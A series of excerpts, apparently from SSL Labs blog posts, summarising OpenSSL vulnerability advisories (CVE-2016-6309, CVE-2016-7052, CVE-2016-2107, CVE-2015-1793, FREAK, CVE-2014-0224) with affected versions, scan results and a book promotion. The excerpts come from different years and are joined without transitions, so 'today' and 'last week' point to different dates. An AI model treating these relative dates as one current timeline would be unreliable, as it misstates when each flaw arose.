Today, OpenSSL has released an update advising of a problem with patches that was released last week on September 22.
The first offending patch was for CVE-2016-6309, and it could result in a crash or even execution of attacker-supplied code resulting in compromise of the patched machine. This issue only affects OpenSSL 1.1.0a, released on 22nd September 2016. As a result OpenSSL 1.1.0 users should upgrade to 1.1.0b.
The second offending patch was for CVE-2016-7052, and if the patch is installed, it could allow attackers to cause a denial of service condition leading to a crash. This issue affects only OpenSSL 1.0.2i, released on 22nd September 2016. As a result OpenSSL 1.0.2i users should upgrade to 1.0.2j.
We are releasing an update to the grading criteria, version 2009m, to respond to the discovery of the OpenSSL vulnerability CVE-2016-2107 announced in the OpenSSL Security Advisory [3rd May 2016]. This vulnerability can be exploited by MITM attacker using a padding Oracle attack to decrypt traffic when the connection uses an AES CBC cipher and the server supports AES-NI.
The OpenSSL team has announced a fix to resolve a high severity vulnerability (CVE-2015-1793) which allows certificate forgery. During certificate verification, OpenSSL (starting from version 1.0.1n and 1.0.2b) will attempt to find an alternative certificate chain if the first attempt to build such a chain fails. An error in the implementation of this logic can mean that an attacker could cause certain checks on untrusted certificates to be bypassed, such as the CA flag, enabling them to use a valid leaf certificate to act as a CA and "issue" an invalid certificate. This issue will impact any application that verifies certificates including SSL/TLS/DTLS clients and SSL/TLS/DTLS servers using client authentication. It affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n and 1.0.1o
This past year we have seen an overwhelming interest in SSL library exploits, and FREAK or "Factoring RSA EXPORT Keys" is another one. The full impact is yet to be known as the flaw was baked in the development of secure web communications, so browsers, web clients and hosts would negotiate the strongest encryption “allowed,” falling back to weaker, “export” protocols as required. The most updated list of browsers appears to include: Internet Explorer, Chrome on Mac OS and Android, Safari on Mac OS and iOS, Blackberry Browser, and Opera on Mac OS and Linux.
Last week (on June 5th), OpenSSL published an advisory detailing a number of serious problems. The CVE-2014-0224 vulnerability will be the most problematic for most deployments because it can be exploited via an active network (man in the middle) attack.
This vulnerability allows an active network attacker to inject ChangeCipherSpec (CCS) messages to both sides of a connection and force them to fix their keys before all key material is available. Weak keys are negotiated as a result. If you’re interested in the details, Adam Langley published a good technical analysis.
Although virtually all versions of OpenSSL are vulnerable, this problem is exploitable only if (1) both sides use OpenSSL and (2) the server uses a vulnerable version of OpenSSL from the 1.0.1 branch.
The good news is that most browsers don’t rely on OpenSSL, which means that most browser users won’t be affected. However, Android browsers do use OpenSSL and are vulnerable to this attack. Additionally, many command-line and similar programmatic tools use OpenSSL. A particularly interesting target will be various VPN products, provided they are based on OpenSSL (like, for example, OpenVPN).
Over at SSL Labs, we’ve been testing a remote check for CVE-2014-0224 since Friday. Satisfied that the test is identifying vulnerable hosts correctly, yesterday we ran a scan against the SSL Pulse dataset. The results are that about 49% servers are vulnerable. About 14% (of the total number) are exploitable because they’re running a newer version of OpenSSL. The rest are probably not exploitable, but should be upgraded because it’s possible that there are other ways to exploit this problem.
If you’d like to test your servers, the latest version of SSL Labs incorporates a check for CVE-2014-0224.
Original: It’s the Thursday before June’s Patch Tuesday, and Microsoft’s Advance Notice just has gone live. In addition, there was an advisory about new fixes for OpenSSL, which comes quite soon after the Heartbleed vulnerability and the numerous exploits it enabled.
OpenSSL Cookbook is a free ebook based around one chapter of my in-progress book Bulletproof SSL/TLS and PKI. The appendix contains the SSL/TLS Deployment Best Practices document (re-published with permission from Qualys). In total, there’s about 50 pages of text that covers the OpenSSL essentials, starting with installation, then key and certificate management, and finally cipher suite configuration.
